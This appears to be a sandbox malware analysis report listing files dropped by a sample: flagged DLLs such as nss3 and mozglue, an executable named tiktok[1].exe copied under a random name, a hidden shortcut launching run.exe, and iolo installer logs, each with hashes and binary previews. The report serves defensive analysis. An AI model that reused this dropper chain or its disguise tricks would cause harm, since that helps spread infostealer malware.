Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\iolo technologies\logs\bootstrap.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	331
Entropy (8bit):	5.199977312211888
Encrypted:	false
SSDEEP:	6:BMKLt+MpjZtaAgrCYl7MpjOmLIYvgBtXSMpjlHB1JCTK7MpU1I0XY4eA:fxaXCY9mkYvgLXj/H73
MD5:	2CBF9B5B56B01DE2F2D48C03A93ABA28
SHA1:	E71C1379929453617B95C3DF1FEE9930DBB7BED5
SHA-256:	725BADC18049128E97A88731162C44FD6BDDEA4FA3066D8045609A11407C4C6B
SHA-512:	986A3F0DB971B796F6AE42A83440A6AE4CACAC6340F86AB8B0811FBC4415B275B215726A7938843E8D65D235952FEBB12B9D890343A259314771C10F0A473823
Malicious:	false
Preview:	Bootstrap LogFile..-----------------..[26/04/2024 23:09:59]: Product System Mechanic Determined From 5488CB36-BE62-4606-B07B-2EE938868BD1..[26/04/2024 23:09:59]: This Brand IOLODEFAULT Not Detected As Installed..[26/04/2024 23:09:59]: No Supported Products Were Detected On This System..[26/04/2024 23:10:24]: Telemetry Data Sent..

C:\ProgramData\iolo\logs\WSComm.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5ek.3.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	346
Entropy (8bit):	5.211023588565343
Encrypted:	false
SSDEEP:	6:q0McTs0TCfk3VotGjZb34L0McoImQilo4MccM0TCfk3VotGjZb34L0MccQiQiloe:117TXVotgOL01o0iT1+TXVotgOL01zit
MD5:	A18AB04FCA1EF0B4683BD03476C8D96B
SHA1:	4882F4FB65D5E5330AF2D4FC8DE32D580CEB5DC0
SHA-256:	EE9E4D0D322301A1CC0E129D26E829E2A40278207EAEF7284415E8AA1E02E12D
SHA-512:	1FECDB237287A6F53E545E797119812B7ACD59E240BE4778B2B27605DB05E398506C8B50AA0AFC7080EBAC6D5EF50B78632AB399C04C258677D458861B4FAE2A
Malicious:	false
Preview:	[04/26/24 23:09:12] PerformGetOrPost : Attempting a POST on http://svc.iolo.com/__svc/sbv/DownloadManager.ashx...[04/26/24 23:09:13] IsValidCommunication : Result := True...[04/26/24 23:09:40] PerformGetOrPost : Attempting a POST on http://svc.iolo.com/__svc/sbv/DownloadManager.ashx...[04/26/24 23:09:40] IsValidCommunication : Result := True...

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5ek.0.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: JHqNlw9U8c.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: QPoX60yhZt.exe, Detection: malicious, Browse Filename: 3R18jv6iGv.exe, Detection: malicious, Browse Filename: YEnIrzZUUw.exe, Detection: malicious, Browse Filename: bUcIhJ4VHm.exe, Detection: malicious, Browse Filename: w3WOJ1ohgD.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5ek.0.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5ek.0.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5ek.0.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5ek.0.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\ApplicationInsights\02b7d1436f6e86786e74c7f14b0eeb043810a2ded0b85707d2c8e2ec408053fe\qubdaohh.xyw

Download File

Process:	C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	93B885ADFE0DA089CDF634904FD59F71
SHA1:	5BA93C9DB0CFF93F52B521D7420E43F6EDA2784F
SHA-256:	6E340B9CFFB37A989CA544E6BB780A2C78901D3FB33738768511A30617AFA01D
SHA-512:	B8244D028981D693AF7B456AF8EFA4CAD63D282E19FF14942C246E50D9351D22704A802A71C3580B6370DE4CEB293C324A8423342557D4E5C38438F0E36910EE
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\MSBuild.exe.log

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	410
Entropy (8bit):	5.361827289088002
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPTAq1KDLI4M0kvoDLI4MWuCv:ML9E4KH1qE4jE4Ks
MD5:	812F0A8C671812AA613FC139B69E8614
SHA1:	B4177437C50B25B06FB885362DA36FD171A1C5A9
SHA-256:	6D3DF2C3EA20D3A411078200AFA62DAC6AABA4210C83A2186E80195977BF0F89
SHA-512:	6A82C1F195C66FCC0533B20B8AE9B4F9CEBED6C8D7B450C574E864A60D627F3ABE32081BF65822157716F4672180E19C0DFA91D88663F7FC3CBE7FD0EB36B2EA
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5ek.0.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5ek.0.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5ek.0.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5ek.0.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5ek.0.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tiktok[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5ek.0.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	545792
Entropy (8bit):	6.384805269039956
Encrypted:	false
SSDEEP:	6144:yU3iKBTO7hQqRGoFyLmVmH6Q4vwRuGuoBhYkuFqeYAOfp+5ic6/:yU7UVGoFyLmVO6Q6wAGuoBh9Np+M/
MD5:	6C93FC68E2F01C20FB81AF24470B790C
SHA1:	D5927B38A32E30AFCF5A658612A8266476FC4AD8
SHA-256:	64A71B664D76641B35DAC312161CB356B3B3B5F0B45C9D88C8AFA547B4902580
SHA-512:	355E9677121EF17CF8C398F0C17399776D206C62014080A2C62682E1152EA0729DCC6E233358DCD6BAE009B07E3DB936D4B18EB37D6E7EBC2FE9CF8D827C4ADE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 47%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......c...'i..'i..'i....[.7i....Y..i....X.8i...7..3i...7...i...7...i....9."i..'i..}i...7..%i...7U.&i..'i=.&i...7..&i..Rich'i..................PE..L....v)f..........................................@.......................................@.................................P...(.......@(................... ..l.......p........................... ...@............................................text...1........................... ..`.rdata..............................@..@.data...@ ..........................@....gfids..............................@..@.rsrc...@(.......*..................@..@.reloc..l.... ......................@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5ek.0.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\EGIJKEHCAK.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5ek.0.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	545792
Entropy (8bit):	6.384805269039956
Encrypted:	false
SSDEEP:	6144:yU3iKBTO7hQqRGoFyLmVmH6Q4vwRuGuoBhYkuFqeYAOfp+5ic6/:yU7UVGoFyLmVO6Q6wAGuoBh9Np+M/
MD5:	6C93FC68E2F01C20FB81AF24470B790C
SHA1:	D5927B38A32E30AFCF5A658612A8266476FC4AD8
SHA-256:	64A71B664D76641B35DAC312161CB356B3B3B5F0B45C9D88C8AFA547B4902580
SHA-512:	355E9677121EF17CF8C398F0C17399776D206C62014080A2C62682E1152EA0729DCC6E233358DCD6BAE009B07E3DB936D4B18EB37D6E7EBC2FE9CF8D827C4ADE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 47%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......c...'i..'i..'i....[.7i....Y..i....X.8i...7..3i...7...i...7...i....9."i..'i..}i...7..%i...7U.&i..'i=.&i...7..&i..Rich'i..................PE..L....v)f..........................................@.......................................@.................................P...(.......@(................... ..l.......p........................... ...@............................................text...1........................... ..`.rdata..............................@..@.data...@ ..........................@....gfids..............................@..@.rsrc...@(.......*..................@..@.reloc..l.... ......................@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\b8e17ab5

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe
File Type:	data
Category:	dropped
Size (bytes):	1514213
Entropy (8bit):	7.748229600099168
Encrypted:	false
SSDEEP:	24576:vIUFcZ/0gD/COw3sTMWjtZEcTvC6k3Qt34RzKjw8/KhQ+NhglNedC0V8s41CbL4u:vNcigD/COPTXTWzWfKQ+ISdC0V8sqCZ
MD5:	732823E6E94FE6E6E7D3143D4FE487B4
SHA1:	4D5E8D5ADCA47EF14FF41FBD1A5FCE925C9F6A84
SHA-256:	FEFB5176D51E5BD0641BFD7748FF1E54DE92890AF7711BBB62A5C608635029E4
SHA-512:	D195AC8503DA70DBD7A538A15BF38DD262F16BBD12145673ACD34120FCD666602DE067AF77E71174F8A1D97E222EF2ED939BA749F9B3EEEA1DFDDADA255A7A83
Malicious:	false
Preview:	......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................F..B...[..y..b..x..e..w...[..J..q..e..w...f..............................................._.....l..........................................................................................U..b...e..u......................................................................................._..D.....e..8..J..{..d.......................................................................8..&.............................................

C:\Users\user\AppData\Local\Temp\d197510f

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe
File Type:	data
Category:	dropped
Size (bytes):	1514213
Entropy (8bit):	7.7482315864317775
Encrypted:	false
SSDEEP:	24576:tIUFcZ/0gD/COw3sTMWjtZEcTvC6k3Qt34RzKjw8/KhQ+NhglNedC0V8s41CbL4u:tNcigD/COPTXTWzWfKQ+ISdC0V8sqCZ
MD5:	62430F67FA4B5764B64DDBB617F426D8
SHA1:	59CAEE4EBA4718D5B0BB22F800981A774C534279
SHA-256:	D2AE1367E23FF8E70A97D8228C9328CF9945E53535F3D59B4FA8617503A77385
SHA-512:	9975349D7D2981E4CD4CD50D458108E71A42CA8797555BFF96FC054B5C04BD98F355F2462A5A633C74777377A26DB0F165D59A4168F3C98ECA783BEE67A8B4D9
Malicious:	false
Preview:	......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................F..B...[..y..b..x..e..w...[..J..q..e..w...f..............................................._.....l..........................................................................................U..b...e..u......................................................................................._..D.....e..8..J..{..d.......................................................................8..&.............................................

C:\Users\user\AppData\Local\Temp\egegedwacimf

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Apr 24 04:56:20 2024, mtime=Fri Apr 26 20:09:08 2024, atime=Wed Apr 24 04:56:20 2024, length=2469936, window=hide
Category:	dropped
Size (bytes):	1063
Entropy (8bit):	5.0060075797951376
Encrypted:	false
SSDEEP:	24:859mC4ONYheRegKU/bSrL0yA/jfRs62P3qyFm:8CC4ONCeRPblRbryF
MD5:	E9FD4FC6A0902FCB164983B4777BF454
SHA1:	3278532C7747D3857D83FCB15AD97B1A8910ECDD
SHA-256:	70681491ECAF15CAA26A8F8B9CBE5F9E383EBCD707F971356288250F8DD2E5B8
SHA-512:	C2E6412B0C89342EA7D8CCCD3B81BFD46AE38E38B97FA56154F9D281135FD2884875FCD57E93D7D3E4B5AE023F859341208ECD508D677FB04159D5EEFAE43068
Malicious:	false
Preview:	L..................F.... ....Z.!............Z.!....0.%.......................:..DG..Yr?.D..U..k0.&...&......vk.v.............^..........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.X.............................%..A.p.p.D.a.t.a...B.P.1......X....Local.<......CW.^.X......b.........................L.o.c.a.l.....N.1......X'...Temp..:......CW.^.X'.....l.........................T.e.m.p.....T.1......X%...u5ek.2..>......X#..X%.....U.....................k...u.5.e.k...2.....V.2.0.%..X./ .run.exe.@......X./.X%..............................r.u.n...e.x.e......._...............-.......^............/S......C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe......\.u.5.e.k...2.\.r.u.n...e.x.e.........\|....I.J.H..K..:...`.......X.......724536...........hT..CrF.f4... ..T..b...,.......hT..CrF.f4... ..T..b...,..................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.2.........9.

C:\Users\user\AppData\Local\Temp\iolo\dm\ioloDMLog.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5ek.3.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4741
Entropy (8bit):	5.483464315579322
Encrypted:	false
SSDEEP:	96:zKHeUuy3MQPvhbyslkbdbabbbDbnbzbjbQbAbGbOorQPirQPirQPirQPixPixPig:MFhgdw/Hb3naKMHQPUQPUQPUQPoPoPoO
MD5:	346BD3191B538D1A799E1B5645779040
SHA1:	30F26B8A27AB4F3C1E75BD9CB7AC44704FCD03FF
SHA-256:	F68D5C79B0A8D99719F85B1F7FFE60616308D0A88C9A5CD2D6F4F6026B05FC47
SHA-512:	45D0A27B6BCC1324051F57803A541FDAAFD08FCD74A0EA16E29EADD36E8A8E93F217D1344A4970D1AF1D855AA8CC80FD9F2B30181A6BFFCB63160C826F0244D9
Malicious:	false
Preview:	[04/26/24 23:09:12] Main : OS Version = osWin10...[04/26/24 23:09:12] CommandLineSwitchExists : Result of check = False. Param Value (if not exact match) = ...[04/26/24 23:09:12] Installer Target URL request = {"IPAddress":"192.168.2.4","Status":1,"Language":"en","OSMinorVersion":0,"OSMajorVersion":10,"ProductId":"5488CB36-BE62-4606-B07B-2EE938868BD1","Is64Bit":true,"ECommId":"11A12794-499E-4FA0-A281-A9A9AA8B2685"}...[04/26/24 23:09:13] Installer target url response = {"Url":"https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe","ProductName":"System Mechanic Standard","Result":0,"ErrorMessage":null}...[04/26/24 23:09:13] DownloadAndLaunchInstaller : Creating BITS download handler...[04/26/24 23:09:13] !&TioloBITSHandler.InitCopyMgr : CreateCOMObject(CLSID_BackgroundCopyManager1_5)..[04/26/24 23:09:22] !&TioloBITSHandler.InitCopyMgr : Copy manager initialized = True...[04/26/24 23:09:22] DownloadAndLaunchInstaller : Target folder ="C:\User

C:\Users\user\AppData\Local\Temp\jwjqeqx

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
